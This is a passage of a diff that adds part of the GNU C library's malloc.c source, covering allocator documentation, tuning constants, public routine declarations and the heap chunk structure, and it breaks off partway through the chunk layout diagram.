+       The maximum overhead wastage (i.e., number of extra bytes
+       allocated than were requested in malloc) is less than or equal
+       to the minimum size, except for requests >= mmap_threshold that
+       are serviced via mmap(), where the worst case wastage is 2 *
+       sizeof(size_t) bytes plus the remainder from a system page (the
+       minimal mmap unit); typically 4096 or 8192 bytes.
+
+  Maximum allocated size:  4-byte size_t: 2^32 minus about two pages
+			   8-byte size_t: 2^64 minus about two pages
+
+       It is assumed that (possibly signed) size_t values suffice to
+       represent chunk sizes. `Possibly signed' is due to the fact
+       that `size_t' may be defined on a system as either a signed or
+       an unsigned type. The ISO C standard says that it must be
+       unsigned, but a few systems are known not to adhere to this.
+       Additionally, even when size_t is unsigned, sbrk (which is by
+       default used to obtain memory from system) accepts signed
+       arguments, and may not be able to handle size_t-wide arguments
+       with negative sign bit.  Generally, values that would
+       appear as negative after accounting for overhead and alignment
+       are supported only via mmap(), which does not have this
+       limitation.
+
+       Requests for sizes outside the allowed range will perform an optional
+       failure action and then return null. (Requests may also
+       also fail because a system is out of memory.)
+
+  Thread-safety: thread-safe
+
+  Compliance: I believe it is compliant with the 1997 Single Unix Specification
+       Also SVID/XPG, ANSI C, and probably others as well.
+
+* Synopsis of compile-time options:
+
+    People have reported using previous versions of this malloc on all
+    versions of Unix, sometimes by tweaking some of the defines
+    below. It has been tested most extensively on Solaris and Linux.
+    People also report using it in stand-alone embedded systems.
+
+    The implementation is in straight, hand-tuned ANSI C.  It is not
+    at all modular. (Sorry!)  It uses a lot of macros.  To be at all
+    usable, this code should be compiled using an optimizing compiler
+    (for example gcc -O3) that can simplify expressions and control
+    paths. (FAQ: some macros import variables as arguments rather than
+    declare locals because people reported that some debuggers
+    otherwise get confused.)
+
+    OPTION                     DEFAULT VALUE
+
+    Compilation Environment options:
+
+    HAVE_MREMAP                0
+
+    Changing default word sizes:
+
+    INTERNAL_SIZE_T            size_t
+
+    Configuration and functionality options:
+
+    USE_PUBLIC_MALLOC_WRAPPERS NOT defined
+    USE_MALLOC_LOCK            NOT defined
+    MALLOC_DEBUG               NOT defined
+    REALLOC_ZERO_BYTES_FREES   1
+    TRIM_FASTBINS              0
+
+    Options for customizing MORECORE:
+
+    MORECORE                   sbrk
+    MORECORE_FAILURE           -1
+    MORECORE_CONTIGUOUS        1
+    MORECORE_CANNOT_TRIM       NOT defined
+    MORECORE_CLEARS            1
+    MMAP_AS_MORECORE_SIZE      (1024 * 1024)
+
+    Tuning options that are also dynamically changeable via mallopt:
+
+    DEFAULT_MXFAST             64 (for 32bit), 128 (for 64bit)
+    DEFAULT_TRIM_THRESHOLD     128 * 1024
+    DEFAULT_TOP_PAD            0
+    DEFAULT_MMAP_THRESHOLD     128 * 1024
+    DEFAULT_MMAP_MAX           65536
+
+    There are several other #defined constants and macros that you
+    probably don't want to touch unless you are extending or adapting malloc.  */
+
+/*
+  void* is the pointer type that malloc should say it returns
+*/
+
+#ifndef void
+#define void      void
+#endif /*void*/
+
+#include <stddef.h>   /* for size_t */
+#include <stdlib.h>   /* for getenv(), abort() */
+#include <unistd.h>   /* for __libc_enable_secure */
+
+#include <atomic.h>
+#include <_itoa.h>
+#include <bits/wordsize.h>
+#include <sys/sysinfo.h>
+
+#include <ldsodefs.h>
+
+#include <unistd.h>
+#include <stdio.h>    /* needed for malloc_stats */
+#include <errno.h>
+#include <assert.h>
+
+#include <shlib-compat.h>
+
+/* For uintptr_t.  */
+#include <stdint.h>
+
+/* For va_arg, va_start, va_end.  */
+#include <stdarg.h>
+
+/* For MIN, MAX, powerof2.  */
+#include <sys/param.h>
+
+/* For ALIGN_UP et. al.  */
+#include <libc-pointer-arith.h>
+
+/* For DIAG_PUSH/POP_NEEDS_COMMENT et al.  */
+#include <libc-diag.h>
+
+#include <malloc/malloc-internal.h>
+
+/* For SINGLE_THREAD_P.  */
+#include <sysdep-cancel.h>
+
+/*
+  Debugging:
+
+  Because freed chunks may be overwritten with bookkeeping fields, this
+  malloc will often die when freed memory is overwritten by user
+  programs.  This can be very effective (albeit in an annoying way)
+  in helping track down dangling pointers.
+
+  If you compile with -DMALLOC_DEBUG, a number of assertion checks are
+  enabled that will catch more memory errors. You probably won't be
+  able to make much sense of the actual assertion errors, but they
+  should help you locate incorrectly overwritten memory.  The checking
+  is fairly extensive, and will slow down execution
+  noticeably. Calling malloc_stats or mallinfo with MALLOC_DEBUG set
+  will attempt to check every non-mmapped allocated and free chunk in
+  the course of computing the summmaries. (By nature, mmapped regions
+  cannot be checked very much automatically.)
+
+  Setting MALLOC_DEBUG may also be helpful if you are trying to modify
+  this code. The assertions in the check routines spell out in more
+  detail the assumptions and invariants underlying the algorithms.
+
+  Setting MALLOC_DEBUG does NOT provide an automated mechanism for
+  checking that all accesses to malloced memory stay within their
+  bounds. However, there are several add-ons and adaptations of this
+  or other mallocs available that do this.
+*/
+
+#ifndef MALLOC_DEBUG
+#define MALLOC_DEBUG 0
+#endif
+
+#ifndef NDEBUG
+# define __assert_fail(assertion, file, line, function)			\
+	 __malloc_assert(assertion, file, line, function)
+
+extern const char *__progname;
+
+static void
+__malloc_assert (const char *assertion, const char *file, unsigned int line,
+		 const char *function)
+{
+  (void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
+		     __progname, __progname[0] ? ": " : "",
+		     file, line,
+		     function ? function : "", function ? ": " : "",
+		     assertion);
+  fflush (stderr);
+  abort ();
+}
+#endif
+
+#if USE_TCACHE
+/* We want 64 entries.  This is an arbitrary limit, which tunables can reduce.  */
+# define TCACHE_MAX_BINS		64
+# define MAX_TCACHE_SIZE	tidx2usize (TCACHE_MAX_BINS-1)
+
+/* Only used to pre-fill the tunables.  */
+# define tidx2usize(idx)	(((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)
+
+/* When "x" is from chunksize().  */
+# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
+/* When "x" is a user-provided size.  */
+# define usize2tidx(x) csize2tidx (request2size (x))
+
+/* With rounding and alignment, the bins are...
+   idx 0   bytes 0..24 (64-bit) or 0..12 (32-bit)
+   idx 1   bytes 25..40 or 13..20
+   idx 2   bytes 41..56 or 21..28
+   etc.  */
+
+/* This is another arbitrary limit, which tunables can change.  Each
+   tcache bin will hold at most this number of chunks.  */
+# define TCACHE_FILL_COUNT 7
+#endif
+
+
+/*
+  REALLOC_ZERO_BYTES_FREES should be set if a call to
+  realloc with zero bytes should be the same as a call to free.
+  This is required by the C standard. Otherwise, since this malloc
+  returns a unique pointer for malloc(0), so does realloc(p, 0).
+*/
+
+#ifndef REALLOC_ZERO_BYTES_FREES
+#define REALLOC_ZERO_BYTES_FREES 1
+#endif
+
+/*
+  TRIM_FASTBINS controls whether free() of a very small chunk can
+  immediately lead to trimming. Setting to true (1) can reduce memory
+  footprint, but will almost always slow down programs that use a lot
+  of small chunks.
+
+  Define this only if you are willing to give up some speed to more
+  aggressively reduce system-level memory footprint when releasing
+  memory in programs that use many small chunks.  You can get
+  essentially the same effect by setting MXFAST to 0, but this can
+  lead to even greater slowdowns in programs using many small chunks.
+  TRIM_FASTBINS is an in-between compile-time option, that disables
+  only those chunks bordering topmost memory from being placed in
+  fastbins.
+*/
+
+#ifndef TRIM_FASTBINS
+#define TRIM_FASTBINS  0
+#endif
+
+
+/* Definition for getting more memory from the OS.  */
+#define MORECORE         (*__morecore)
+#define MORECORE_FAILURE 0
+void * __default_morecore (ptrdiff_t);
+void *(*__morecore)(ptrdiff_t) = __default_morecore;
+
+
+#include <string.h>
+
+/*
+  MORECORE-related declarations. By default, rely on sbrk
+*/
+
+
+/*
+  MORECORE is the name of the routine to call to obtain more memory
+  from the system.  See below for general guidance on writing
+  alternative MORECORE functions, as well as a version for WIN32 and a
+  sample version for pre-OSX macos.
+*/
+
+#ifndef MORECORE
+#define MORECORE sbrk
+#endif
+
+/*
+  MORECORE_FAILURE is the value returned upon failure of MORECORE
+  as well as mmap. Since it cannot be an otherwise valid memory address,
+  and must reflect values of standard sys calls, you probably ought not
+  try to redefine it.
+*/
+
+#ifndef MORECORE_FAILURE
+#define MORECORE_FAILURE (-1)
+#endif
+
+/*
+  If MORECORE_CONTIGUOUS is true, take advantage of fact that
+  consecutive calls to MORECORE with positive arguments always return
+  contiguous increasing addresses.  This is true of unix sbrk.  Even
+  if not defined, when regions happen to be contiguous, malloc will
+  permit allocations spanning regions obtained from different
+  calls. But defining this when applicable enables some stronger
+  consistency checks and space efficiencies.
+*/
+
+#ifndef MORECORE_CONTIGUOUS
+#define MORECORE_CONTIGUOUS 1
+#endif
+
+/*
+  Define MORECORE_CANNOT_TRIM if your version of MORECORE
+  cannot release space back to the system when given negative
+  arguments. This is generally necessary only if you are using
+  a hand-crafted MORECORE function that cannot handle negative arguments.
+*/
+
+/* #define MORECORE_CANNOT_TRIM */
+
+/*  MORECORE_CLEARS           (default 1)
+     The degree to which the routine mapped to MORECORE zeroes out
+     memory: never (0), only for newly allocated space (1) or always
+     (2).  The distinction between (1) and (2) is necessary because on
+     some systems, if the application first decrements and then
+     increments the break value, the contents of the reallocated space
+     are unspecified.
+ */
+
+#ifndef MORECORE_CLEARS
+# define MORECORE_CLEARS 1
+#endif
+
+
+/*
+   MMAP_AS_MORECORE_SIZE is the minimum mmap size argument to use if
+   sbrk fails, and mmap is used as a backup.  The value must be a
+   multiple of page size.  This backup strategy generally applies only
+   when systems have "holes" in address space, so sbrk cannot perform
+   contiguous expansion, but there is still space available on system.
+   On systems for which this is known to be useful (i.e. most linux
+   kernels), this occurs only when programs allocate huge amounts of
+   memory.  Between this, and the fact that mmap regions tend to be
+   limited, the size should be large, to avoid too many mmap calls and
+   thus avoid running out of kernel resources.  */
+
+#ifndef MMAP_AS_MORECORE_SIZE
+#define MMAP_AS_MORECORE_SIZE (1024 * 1024)
+#endif
+
+/*
+  Define HAVE_MREMAP to make realloc() use mremap() to re-allocate
+  large blocks.
+*/
+
+#ifndef HAVE_MREMAP
+#define HAVE_MREMAP 0
+#endif
+
+/* We may need to support __malloc_initialize_hook for backwards
+   compatibility.  */
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_24)
+# define HAVE_MALLOC_INIT_HOOK 1
+#else
+# define HAVE_MALLOC_INIT_HOOK 0
+#endif
+
+
+/*
+  This version of malloc supports the standard SVID/XPG mallinfo
+  routine that returns a struct containing usage properties and
+  statistics. It should work on any SVID/XPG compliant system that has
+  a /usr/include/malloc.h defining struct mallinfo. (If you'd like to
+  install such a thing yourself, cut out the preliminary declarations
+  as described above and below and save them in a malloc.h file. But
+  there's no compelling reason to bother to do this.)
+
+  The main declaration needed is the mallinfo struct that is returned
+  (by-copy) by mallinfo().  The SVID/XPG malloinfo struct contains a
+  bunch of fields that are not even meaningful in this version of
+  malloc.  These fields are are instead filled by mallinfo() with
+  other numbers that might be of interest.
+*/
+
+
+/* ---------- description of public routines ------------ */
+
+/*
+  malloc(size_t n)
+  Returns a pointer to a newly allocated chunk of at least n bytes, or null
+  if no space is available. Additionally, on failure, errno is
+  set to ENOMEM on ANSI C systems.
+
+  If n is zero, malloc returns a minumum-sized chunk. (The minimum
+  size is 16 bytes on most 32bit systems, and 24 or 32 bytes on 64bit
+  systems.)  On most systems, size_t is an unsigned type, so calls
+  with negative arguments are interpreted as requests for huge amounts
+  of space, which will often fail. The maximum supported value of n
+  differs across systems, but is in all cases less than the maximum
+  representable value of a size_t.
+*/
+void*  __libc_malloc(size_t);
+libc_hidden_proto (__libc_malloc)
+
+/*
+  free(void* p)
+  Releases the chunk of memory pointed to by p, that had been previously
+  allocated using malloc or a related routine such as realloc.
+  It has no effect if p is null. It can have arbitrary (i.e., bad!)
+  effects if p has already been freed.
+
+  Unless disabled (using mallopt), freeing very large spaces will
+  when possible, automatically trigger operations that give
+  back unused memory to the system, thus reducing program footprint.
+*/
+void     __libc_free(void*);
+libc_hidden_proto (__libc_free)
+
+/*
+  calloc(size_t n_elements, size_t element_size);
+  Returns a pointer to n_elements * element_size bytes, with all locations
+  set to zero.
+*/
+void*  __libc_calloc(size_t, size_t);
+
+/*
+  realloc(void* p, size_t n)
+  Returns a pointer to a chunk of size n that contains the same data
+  as does chunk p up to the minimum of (n, p's size) bytes, or null
+  if no space is available.
+
+  The returned pointer may or may not be the same as p. The algorithm
+  prefers extending p when possible, otherwise it employs the
+  equivalent of a malloc-copy-free sequence.
+
+  If p is null, realloc is equivalent to malloc.
+
+  If space is not available, realloc returns null, errno is set (if on
+  ANSI) and p is NOT freed.
+
+  if n is for fewer bytes than already held by p, the newly unused
+  space is lopped off and freed if possible.  Unless the #define
+  REALLOC_ZERO_BYTES_FREES is set, realloc with a size argument of
+  zero (re)allocates a minimum-sized chunk.
+
+  Large chunks that were internally obtained via mmap will always be
+  grown using malloc-copy-free sequences unless the system supports
+  MREMAP (currently only linux).
+
+  The old unix realloc convention of allowing the last-free'd chunk
+  to be used as an argument to realloc is not supported.
+*/
+void*  __libc_realloc(void*, size_t);
+libc_hidden_proto (__libc_realloc)
+
+/*
+  memalign(size_t alignment, size_t n);
+  Returns a pointer to a newly allocated chunk of n bytes, aligned
+  in accord with the alignment argument.
+
+  The alignment argument should be a power of two. If the argument is
+  not a power of two, the nearest greater power is used.
+  8-byte alignment is guaranteed by normal malloc calls, so don't
+  bother calling memalign with an argument of 8 or less.
+
+  Overreliance on memalign is a sure way to fragment space.
+*/
+void*  __libc_memalign(size_t, size_t);
+libc_hidden_proto (__libc_memalign)
+
+/*
+  valloc(size_t n);
+  Equivalent to memalign(pagesize, n), where pagesize is the page
+  size of the system. If the pagesize is unknown, 4096 is used.
+*/
+void*  __libc_valloc(size_t);
+
+
+
+/*
+  mallopt(int parameter_number, int parameter_value)
+  Sets tunable parameters The format is to provide a
+  (parameter-number, parameter-value) pair.  mallopt then sets the
+  corresponding parameter to the argument value if it can (i.e., so
+  long as the value is meaningful), and returns 1 if successful else
+  0.  SVID/XPG/ANSI defines four standard param numbers for mallopt,
+  normally defined in malloc.h.  Only one of these (M_MXFAST) is used
+  in this malloc. The others (M_NLBLKS, M_GRAIN, M_KEEP) don't apply,
+  so setting them has no effect. But this malloc also supports four
+  other options in mallopt. See below for details.  Briefly, supported
+  parameters are as follows (listed defaults are for "typical"
+  configurations).
+
+  Symbol            param #   default    allowed param values
+  M_MXFAST          1         64         0-80  (0 disables fastbins)
+  M_TRIM_THRESHOLD -1         128*1024   any   (-1U disables trimming)
+  M_TOP_PAD        -2         0          any
+  M_MMAP_THRESHOLD -3         128*1024   any   (or 0 if no MMAP support)
+  M_MMAP_MAX       -4         65536      any   (0 disables use of mmap)
+*/
+int      __libc_mallopt(int, int);
+libc_hidden_proto (__libc_mallopt)
+
+
+/*
+  mallinfo()
+  Returns (by copy) a struct containing various summary statistics:
+
+  arena:     current total non-mmapped bytes allocated from system
+  ordblks:   the number of free chunks
+  smblks:    the number of fastbin blocks (i.e., small chunks that
+	       have been freed but not use resused or consolidated)
+  hblks:     current number of mmapped regions
+  hblkhd:    total bytes held in mmapped regions
+  usmblks:   always 0
+  fsmblks:   total bytes held in fastbin blocks
+  uordblks:  current total allocated space (normal or mmapped)
+  fordblks:  total free space
+  keepcost:  the maximum number of bytes that could ideally be released
+	       back to system via malloc_trim. ("ideally" means that
+	       it ignores page restrictions etc.)
+
+  Because these fields are ints, but internal bookkeeping may
+  be kept as longs, the reported values may wrap around zero and
+  thus be inaccurate.
+*/
+struct mallinfo __libc_mallinfo(void);
+
+
+/*
+  pvalloc(size_t n);
+  Equivalent to valloc(minimum-page-that-holds(n)), that is,
+  round up n to nearest pagesize.
+ */
+void*  __libc_pvalloc(size_t);
+
+/*
+  malloc_trim(size_t pad);
+
+  If possible, gives memory back to the system (via negative
+  arguments to sbrk) if there is unused memory at the `high' end of
+  the malloc pool. You can call this after freeing large blocks of
+  memory to potentially reduce the system-level memory requirements
+  of a program. However, it cannot guarantee to reduce memory. Under
+  some allocation patterns, some large free blocks of memory will be
+  locked between two used chunks, so they cannot be given back to
+  the system.
+
+  The `pad' argument to malloc_trim represents the amount of free
+  trailing space to leave untrimmed. If this argument is zero,
+  only the minimum amount of memory to maintain internal data
+  structures will be left (one page or less). Non-zero arguments
+  can be supplied to maintain enough trailing space to service
+  future expected allocations without having to re-obtain memory
+  from the system.
+
+  Malloc_trim returns 1 if it actually released any memory, else 0.
+  On systems that do not support "negative sbrks", it will always
+  return 0.
+*/
+int      __malloc_trim(size_t);
+
+/*
+  malloc_usable_size(void* p);
+
+  Returns the number of bytes you can actually use in
+  an allocated chunk, which may be more than you requested (although
+  often not) due to alignment and minimum size constraints.
+  You can use this many bytes without worrying about
+  overwriting other allocated objects. This is not a particularly great
+  programming practice. malloc_usable_size can be more useful in
+  debugging and assertions, for example:
+
+  p = malloc(n);
+  assert(malloc_usable_size(p) >= 256);
+
+*/
+size_t   __malloc_usable_size(void*);
+
+/*
+  malloc_stats();
+  Prints on stderr the amount of space obtained from the system (both
+  via sbrk and mmap), the maximum amount (which may be more than
+  current if malloc_trim and/or munmap got called), and the current
+  number of bytes allocated via malloc (or realloc, etc) but not yet
+  freed. Note that this is the number of bytes allocated, not the
+  number requested. It will be larger than the number requested
+  because of alignment and bookkeeping overhead. Because it includes
+  alignment wastage as being in use, this figure may be greater than
+  zero even when no user-level chunks are allocated.
+
+  The reported current and maximum system memory can be inaccurate if
+  a program makes other calls to system memory allocation functions
+  (normally sbrk) outside of malloc.
+
+  malloc_stats prints only the most commonly interesting statistics.
+  More information can be obtained by calling mallinfo.
+
+*/
+void     __malloc_stats(void);
+
+/*
+  posix_memalign(void **memptr, size_t alignment, size_t size);
+
+  POSIX wrapper like memalign(), checking for validity of size.
+*/
+int      __posix_memalign(void **, size_t, size_t);
+
+/* mallopt tuning options */
+
+/*
+  M_MXFAST is the maximum request size used for "fastbins", special bins
+  that hold returned chunks without consolidating their spaces. This
+  enables future requests for chunks of the same size to be handled
+  very quickly, but can increase fragmentation, and thus increase the
+  overall memory footprint of a program.
+
+  This malloc manages fastbins very conservatively yet still
+  efficiently, so fragmentation is rarely a problem for values less
+  than or equal to the default.  The maximum supported value of MXFAST
+  is 80. You wouldn't want it any higher than this anyway.  Fastbins
+  are designed especially for use with many small structs, objects or
+  strings -- the default handles structs/objects/arrays with sizes up
+  to 8 4byte fields, or small strings representing words, tokens,
+  etc. Using fastbins for larger objects normally worsens
+  fragmentation without improving speed.
+
+  M_MXFAST is set in REQUEST size units. It is internally used in
+  chunksize units, which adds padding and alignment.  You can reduce
+  M_MXFAST to 0 to disable all use of fastbins.  This causes the malloc
+  algorithm to be a closer approximation of fifo-best-fit in all cases,
+  not just for larger requests, but will generally cause it to be
+  slower.
+*/
+
+
+/* M_MXFAST is a standard SVID/XPG tuning option, usually listed in malloc.h */
+#ifndef M_MXFAST
+#define M_MXFAST            1
+#endif
+
+#ifndef DEFAULT_MXFAST
+#define DEFAULT_MXFAST     (64 * SIZE_SZ / 4)
+#endif
+
+
+/*
+  M_TRIM_THRESHOLD is the maximum amount of unused top-most memory
+  to keep before releasing via malloc_trim in free().
+
+  Automatic trimming is mainly useful in long-lived programs.
+  Because trimming via sbrk can be slow on some systems, and can
+  sometimes be wasteful (in cases where programs immediately
+  afterward allocate more large chunks) the value should be high
+  enough so that your overall system performance would improve by
+  releasing this much memory.
+
+  The trim threshold and the mmap control parameters (see below)
+  can be traded off with one another. Trimming and mmapping are
+  two different ways of releasing unused memory back to the
+  system. Between these two, it is often possible to keep
+  system-level demands of a long-lived program down to a bare
+  minimum. For example, in one test suite of sessions measuring
+  the XF86 X server on Linux, using a trim threshold of 128K and a
+  mmap threshold of 192K led to near-minimal long term resource
+  consumption.
+
+  If you are using this malloc in a long-lived program, it should
+  pay to experiment with these values.  As a rough guide, you
+  might set to a value close to the average size of a process
+  (program) running on your system.  Releasing this much memory
+  would allow such a process to run in memory.  Generally, it's
+  worth it to tune for trimming rather tham memory mapping when a
+  program undergoes phases where several large chunks are
+  allocated and released in ways that can reuse each other's
+  storage, perhaps mixed with phases where there are no such
+  chunks at all.  And in well-behaved long-lived programs,
+  controlling release of large blocks via trimming versus mapping
+  is usually faster.
+
+  However, in most programs, these parameters serve mainly as
+  protection against the system-level effects of carrying around
+  massive amounts of unneeded memory. Since frequent calls to
+  sbrk, mmap, and munmap otherwise degrade performance, the default
+  parameters are set to relatively high values that serve only as
+  safeguards.
+
+  The trim value It must be greater than page size to have any useful
+  effect.  To disable trimming completely, you can set to
+  (unsigned long)(-1)
+
+  Trim settings interact with fastbin (MXFAST) settings: Unless
+  TRIM_FASTBINS is defined, automatic trimming never takes place upon
+  freeing a chunk with size less than or equal to MXFAST. Trimming is
+  instead delayed until subsequent freeing of larger chunks. However,
+  you can still force an attempted trim by calling malloc_trim.
+
+  Also, trimming is not generally possible in cases where
+  the main arena is obtained via mmap.
+
+  Note that the trick some people use of mallocing a huge space and
+  then freeing it at program startup, in an attempt to reserve system
+  memory, doesn't have the intended effect under automatic trimming,
+  since that memory will immediately be returned to the system.
+*/
+
+#define M_TRIM_THRESHOLD       -1
+
+#ifndef DEFAULT_TRIM_THRESHOLD
+#define DEFAULT_TRIM_THRESHOLD (128 * 1024)
+#endif
+
+/*
+  M_TOP_PAD is the amount of extra `padding' space to allocate or
+  retain whenever sbrk is called. It is used in two ways internally:
+
+  * When sbrk is called to extend the top of the arena to satisfy
+  a new malloc request, this much padding is added to the sbrk
+  request.
+
+  * When malloc_trim is called automatically from free(),
+  it is used as the `pad' argument.
+
+  In both cases, the actual amount of padding is rounded
+  so that the end of the arena is always a system page boundary.
+
+  The main reason for using padding is to avoid calling sbrk so
+  often. Having even a small pad greatly reduces the likelihood
+  that nearly every malloc request during program start-up (or
+  after trimming) will invoke sbrk, which needlessly wastes
+  time.
+
+  Automatic rounding-up to page-size units is normally sufficient
+  to avoid measurable overhead, so the default is 0.  However, in
+  systems where sbrk is relatively slow, it can pay to increase
+  this value, at the expense of carrying around more memory than
+  the program needs.
+*/
+
+#define M_TOP_PAD              -2
+
+#ifndef DEFAULT_TOP_PAD
+#define DEFAULT_TOP_PAD        (0)
+#endif
+
+/*
+  MMAP_THRESHOLD_MAX and _MIN are the bounds on the dynamically
+  adjusted MMAP_THRESHOLD.
+*/
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MIN
+#define DEFAULT_MMAP_THRESHOLD_MIN (128 * 1024)
+#endif
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MAX
+  /* For 32-bit platforms we cannot increase the maximum mmap
+     threshold much because it is also the minimum value for the
+     maximum heap size and its alignment.  Going above 512k (i.e., 1M
+     for new heaps) wastes too much address space.  */
+# if __WORDSIZE == 32
+#  define DEFAULT_MMAP_THRESHOLD_MAX (512 * 1024)
+# else
+#  define DEFAULT_MMAP_THRESHOLD_MAX (4 * 1024 * 1024 * sizeof(long))
+# endif
+#endif
+
+/*
+  M_MMAP_THRESHOLD is the request size threshold for using mmap()
+  to service a request. Requests of at least this size that cannot
+  be allocated using already-existing space will be serviced via mmap.
+  (If enough normal freed space already exists it is used instead.)
+
+  Using mmap segregates relatively large chunks of memory so that
+  they can be individually obtained and released from the host
+  system. A request serviced through mmap is never reused by any
+  other request (at least not directly; the system may just so
+  happen to remap successive requests to the same locations).
+
+  Segregating space in this way has the benefits that:
+
+   1. Mmapped space can ALWAYS be individually released back
+      to the system, which helps keep the system level memory
+      demands of a long-lived program low.
+   2. Mapped memory can never become `locked' between
+      other chunks, as can happen with normally allocated chunks, which
+      means that even trimming via malloc_trim would not release them.
+   3. On some systems with "holes" in address spaces, mmap can obtain
+      memory that sbrk cannot.
+
+  However, it has the disadvantages that:
+
+   1. The space cannot be reclaimed, consolidated, and then
+      used to service later requests, as happens with normal chunks.
+   2. It can lead to more wastage because of mmap page alignment
+      requirements
+   3. It causes malloc performance to be more dependent on host
+      system memory management support routines which may vary in
+      implementation quality and may impose arbitrary
+      limitations. Generally, servicing a request via normal
+      malloc steps is faster than going through a system's mmap.
+
+  The advantages of mmap nearly always outweigh disadvantages for
+  "large" chunks, but the value of "large" varies across systems.  The
+  default is an empirically derived value that works well in most
+  systems.
+
+
+  Update in 2006:
+  The above was written in 2001. Since then the world has changed a lot.
+  Memory got bigger. Applications got bigger. The virtual address space
+  layout in 32 bit linux changed.
+
+  In the new situation, brk() and mmap space is shared and there are no
+  artificial limits on brk size imposed by the kernel. What is more,
+  applications have started using transient allocations larger than the
+  128Kb as was imagined in 2001.
+
+  The price for mmap is also high now; each time glibc mmaps from the
+  kernel, the kernel is forced to zero out the memory it gives to the
+  application. Zeroing memory is expensive and eats a lot of cache and
+  memory bandwidth. This has nothing to do with the efficiency of the
+  virtual memory system, by doing mmap the kernel just has no choice but
+  to zero.
+
+  In 2001, the kernel had a maximum size for brk() which was about 800
+  megabytes on 32 bit x86, at that point brk() would hit the first
+  mmaped shared libaries and couldn't expand anymore. With current 2.6
+  kernels, the VA space layout is different and brk() and mmap
+  both can span the entire heap at will.
+
+  Rather than using a static threshold for the brk/mmap tradeoff,
+  we are now using a simple dynamic one. The goal is still to avoid
+  fragmentation. The old goals we kept are
+  1) try to get the long lived large allocations to use mmap()
+  2) really large allocations should always use mmap()
+  and we're adding now:
+  3) transient allocations should use brk() to avoid forcing the kernel
+     having to zero memory over and over again
+
+  The implementation works with a sliding threshold, which is by default
+  limited to go between 128Kb and 32Mb (64Mb for 64 bitmachines) and starts
+  out at 128Kb as per the 2001 default.
+
+  This allows us to satisfy requirement 1) under the assumption that long
+  lived allocations are made early in the process' lifespan, before it has
+  started doing dynamic allocations of the same size (which will
+  increase the threshold).
+
+  The upperbound on the threshold satisfies requirement 2)
+
+  The threshold goes up in value when the application frees memory that was
+  allocated with the mmap allocator. The idea is that once the application
+  starts freeing memory of a certain size, it's highly probable that this is
+  a size the application uses for transient allocations. This estimator
+  is there to satisfy the new third requirement.
+
+*/
+
+#define M_MMAP_THRESHOLD      -3
+
+#ifndef DEFAULT_MMAP_THRESHOLD
+#define DEFAULT_MMAP_THRESHOLD DEFAULT_MMAP_THRESHOLD_MIN
+#endif
+
+/*
+  M_MMAP_MAX is the maximum number of requests to simultaneously
+  service using mmap. This parameter exists because
+  some systems have a limited number of internal tables for
+  use by mmap, and using more than a few of them may degrade
+  performance.
+
+  The default is set to a value that serves only as a safeguard.
+  Setting to 0 disables use of mmap for servicing large requests.
+*/
+
+#define M_MMAP_MAX             -4
+
+#ifndef DEFAULT_MMAP_MAX
+#define DEFAULT_MMAP_MAX       (65536)
+#endif
+
+#include <malloc.h>
+
+#ifndef RETURN_ADDRESS
+#define RETURN_ADDRESS(X_) (NULL)
+#endif
+
+/* Forward declarations.  */
+struct malloc_chunk;
+typedef struct malloc_chunk* mchunkptr;
+
+/* Internal routines.  */
+
+static void*  _int_malloc(mstate, size_t);
+static void     _int_free(mstate, mchunkptr, int);
+static void*  _int_realloc(mstate, mchunkptr, INTERNAL_SIZE_T,
+			   INTERNAL_SIZE_T);
+static void*  _int_memalign(mstate, size_t, size_t);
+static void*  _mid_memalign(size_t, size_t, void *);
+
+static void malloc_printerr(const char *str) __attribute__ ((noreturn));
+
+static void* mem2mem_check(void *p, size_t sz);
+static void top_check(void);
+static void munmap_chunk(mchunkptr p);
+#if HAVE_MREMAP
+static mchunkptr mremap_chunk(mchunkptr p, size_t new_size);
+#endif
+
+static void*   malloc_check(size_t sz, const void *caller);
+static void      free_check(void* mem, const void *caller);
+static void*   realloc_check(void* oldmem, size_t bytes,
+			       const void *caller);
+static void*   memalign_check(size_t alignment, size_t bytes,
+				const void *caller);
+
+/* ------------------ MMAP support ------------------  */
+
+
+#include <fcntl.h>
+#include <sys/mman.h>
+
+#if !defined(MAP_ANONYMOUS) && defined(MAP_ANON)
+# define MAP_ANONYMOUS MAP_ANON
+#endif
+
+#ifndef MAP_NORESERVE
+# define MAP_NORESERVE 0
+#endif
+
+#define MMAP(addr, size, prot, flags) \
+ __mmap((addr), (size), (prot), (flags)|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)
+
+
+/*
+  -----------------------  Chunk representations -----------------------
+*/
+
+
+/*
+  This struct declaration is misleading (but accurate and necessary).
+  It declares a "view" into memory allowing access to necessary
+  fields at known offsets from a given base. See explanation below.
+*/
+
+struct malloc_chunk {
+
+  INTERNAL_SIZE_T      mchunk_prev_size;  /* Size of previous chunk (if free).  */
+  INTERNAL_SIZE_T      mchunk_size;       /* Size in bytes, including overhead. */
+
+  struct malloc_chunk* fd;         /* double links -- used only if free. */
+  struct malloc_chunk* bk;
+
+  /* Only used for large blocks: pointer to next larger size.  */
+  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
+  struct malloc_chunk* bk_nextsize;
+};
+
+
+/*
+   malloc_chunk details:
+
+    (The following includes lightly edited explanations by Colin Plumb.)
+
+    Chunks of memory are maintained using a `boundary tag' method as
+    described in e.g., Knuth or Standish.  (See the paper by Paul
+    Wilson ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps for a
+    survey of such techniques.)  Sizes of free chunks are stored both
+    in the front of each chunk and at the end.  This makes
+    consolidating fragmented chunks into bigger chunks very fast.  The
+    size fields also hold bits representing whether chunks are free or
+    in use.
+
+    An allocated chunk looks like this:
+
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of chunk, in bytes                     |A|M|P|
